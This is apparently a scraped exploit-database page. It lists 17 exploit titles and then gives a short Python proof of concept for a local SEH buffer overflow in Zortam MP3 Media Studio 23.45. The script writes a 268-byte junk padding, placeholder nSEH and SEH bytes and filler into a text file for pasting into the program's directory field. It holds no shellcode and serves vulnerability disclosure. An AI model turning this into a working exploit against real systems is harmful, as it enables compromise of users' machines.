
17 changes to exploits/shellcodes Barco ClickShare CSE-200 - Remote Denial of Service Microsoft Windows - 'nt!NtQueryFullAttributesFile' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryAttributesFile' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryVolumeInformationFile' Kernel Stack Memory Disclosure Microsoft Windows - 'nt!NtQuerySystemInformation (SystemPageFileInformation(Ex))' Kernel 64-bit Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationTransactionManager (TransactionManagerRecoveryInformation)' Kernel Pool Memory Disclosure Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessImageFileName)' Kernel 64-bit Pool/Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryVirtualMemory (Memory(Privileged)BasicInformation)' Kernel 64-bit Stack Memory Disclosure Microsoft Windows - 'nt!NtQueryVirtualMemory (MemoryImageInformation)' Kernel 64-bit Stack Memory Disclosure Microsoft Windows - 'CiSetFileCache' TOCTOU Incomplete Fix Microsoft Edge - 'OpenProcess()' ACG Bypass Zortam MP3 Media Studio 23.45 - Local Buffer Overflow (SEH) SysGauge Pro 4.6.12 - Local Buffer Overflow (SEH) CloudMe Sync 1.11.0 - Local Buffer Overflow Cobub Razor 0.8.0 - SQL injection Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference
22 lines
No EOL
617 B
Python
Executable file
22 lines
No EOL
617 B
Python
Executable file
#!/usr/bin/python
|
|
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
|
|
# Author: Kevin McGuigan
|
|
# Twitter: @_h3xagram
|
|
# Author Website: https://www.7elements.co.uk
|
|
# Vendor Website: http://www.zortam.com/
|
|
# Version: 23.45
|
|
# Tested on: Windows 7 32 bit
|
|
# Date: 12/04/2018
|
|
# Vendor did not respond to advisory
|
|
|
|
|
|
# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field
|
|
filename="zortamPOC.txt"
|
|
junk = "A" * 268
|
|
nseh = "B" * 4
|
|
seh="C" * 4
|
|
fill = "D" *900
|
|
buffer = junk + nseh + seh + fill
|
|
textfile = open(filename , 'w')
|
|
textfile.write(buffer)
|
|
textfile.close() |